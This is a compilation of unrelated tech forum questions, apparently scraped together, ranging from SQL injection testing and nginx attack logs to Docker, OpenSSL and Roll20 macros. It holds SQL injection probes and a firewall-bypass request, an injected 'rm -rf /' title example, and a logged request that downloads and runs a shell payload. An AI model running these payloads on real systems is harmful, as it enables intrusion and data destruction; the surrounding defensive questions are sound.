SQL Injection Doesn’t Sanitize But Doesn’t Execute Commands

I am currently doing a pentesting on a web application and focusing more on SQL Injection. This company I am pentesting have a functionality in which we are allowed to buy things from the vendors/suppliers registered there. When a product is added to our cart and ‘Checkout’ button is clicked, the web application will then communicate to the backend to create a cart based on specified ‘cart_id’ and INSERT it to the database. I know this is the case since when I tried to resubmit the request to the server the following error is specified:

"SQLIntegrityConstraintViolationException: Duplicate entry 'RANDOM_ALPHANUMERIC_CART_ID' for key 'idx_cart_id'" 

I tried checking for SQL Injection by adding a single quote at the end of the ‘cart_id’ and HTTP 200 is returned along with server response of a new cart_id with the single quote included. Does this mean It is not sanitizing input? I tried inserting other SQL Commands, the server will still return 200 and the commands are being printed out on the server response but not being executed. Is this web app vulnerable to SQLi (blind?)? If not, Is it possible for me to achieve other vuln such as Stored XSS?

Thank you

site does not respond to some sql injection commands [closed]

I work on a target that I know has SQL injection bug, because in this URL:


I get this answer

Database Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘Select * form aduan.emel’ ORDER BY transaksi_aduan.no_pendaftaran asc’ at line 11

But some sql commands, like UNION SELECT @@version-- and Union+select+NUll,null-- don’t work!

When I submit them, the server responds with error 500.

Why does this happen? I think it is the firewall, is there any way to bypass it?

Notice: I have tried all the tamper options in sqlmap, but they didn’t work and the server returned: connection timed out to the target URL or proxy

I also tried –tor but it didn’t work.

Where is the problem?

Is it possible to run commands that exist only on the host on a docker container?

We would like to harden our Docker Image and remove redundant software from it. Our Devs and Ops asked to keep some Linux tools used for debugging on the containers running on our Kubernetes Prod environment.

I’ve read this post: https://www.digitalocean.com/community/tutorials/how-to-inspect-kubernetes-networking

And it made me wonder, is it possible to run commands that exist only on the host, on a container (which those commands have been removed from)?

If so is there a difference between commands that have been removed from the container than ones that the user don’t have permissions to run?

P.S. How do the tools in the above mentioned post work?

Thanks for the help! 🙂

Why did “terminal commands” never get a version of SQL “parameterized queries”?

I was taught horrible bad practice when I initially "learned" SQL, which baked in user-submitted input with quotes and attempted to "escape" this (in the beginning, I didn’t even escape it at all…). I then had to spend many years unlearning this, to instead do things like:

SELECT * FROM table WHERE id = $  1; 

And then the $ 1‘s data is sent separately to the database, not part of the actual query string, to make it impossible for "SQL injections" to happen.

However, terminal commands frequently need to be sent untrusted user input, such as:

generate_PDF.exe --template="a path goes here" --title-of-report="arbitrary title from user" 

Every time I have to run such a command, I’m scared to death that my "terminal argument escape" function isn’t working correctly, or has some unknown bug, so that users can make a title along the lines of "; rm -rf /; to execute arbitrary code on my machine.

This becomes even more of a serious issue when the normal "OS quotes" cannot be used, such as:

pg_dump --format custom --file "a real path" --exclude-table="schema name"."table name" 

The "schema name"."table name" part has to be provided in full from the user, and thus I have to attempt to verify the syntax myself, as it cannot just be quoted in its entirety with the "terminal argument escaper" function wrapping it all. (Even if it might be possible in this specific context, I’m talking in general and just using this as an example of when it gets "hairy".)

This has made me wonder why the terminal commands, for example in PHP (since I use this myself for everything) cannot be done like this:

pg_dump --format custom --file $  1 --exclude-table=$  2 

And then we send the actual arguments separately as an array of strings, just like with the "parameterized queries" in SQL databases?

Please note that the $ 1 and $ 2 here do not refer to PHP variables, but to "placeholders" for the "engine" which interprets this and which lives either in PHP or the OS.

Why is this not a thing? Or maybe it is, only I haven’t heard of it? I’m continuously baffled by how many things which I constantly need and use just "sit there and rot" while they keep releasing a new programming language every week which nobody uses. I feel more and more frustrated about how "stale" everything I care about seems, but this risks getting off-topic, so I’ll stick to the question I’ve just asked for now.

Can Windows CMD/DOS Commands Be Used In An OpenSSL Configuration File On Windows 10? [migrated]

I’m using OpenSSL v1.1.1g on a Windows 10 machine (I don’t know Linux – yet). Can Windows CMD/DOS commands be used in the OpenSSL configuration file or is the configuration file limited to the use of OpenSSL commands only? I assume the answer to this question is "No" since OpenSSL uses its own parser to process OpenSSL configuration files, but I’d like to have my assumption confirmed.

Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs: - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world" - -  "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" - -  "GET / HTTP/1.1" 400 157 "-" "-" - -  "GET / HTTP/1.1" 400 157 "-" "-" 

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?

How can I issue multiple commands from a single query choice in Roll20?

I created a set of macros using the API to generate attributes for characters on Roll20 to refer to their pronouns for use in macros. I currently have it set up with 3 macros, each with 4 lines because I can’t add multiple attributes with a single command.

How can I use a macro to query which set (male, female, or neutral) of pronouns I want to use? I know I should be able to do something like

 ?{Male, Female, or Neutral? | Male,#Pronouns_M | Female,#Pronouns_F | Neutral,#Pronouns_N}  

And that should work, but I’d rather have it where the contents of those sub-macros are in the main one and delete the sub-macros. Problem is, each of the sub macros is 4 lines such as #Pronouns_F

 !setattr --sel --subjective|'she'  !setattr --sel --objective|'her'  !setattr --sel --PossessiveA|'her'  !setattr --sel --PossessiveP|'hers'  

Is this a thing I can do or do I have to settle for the sub macros?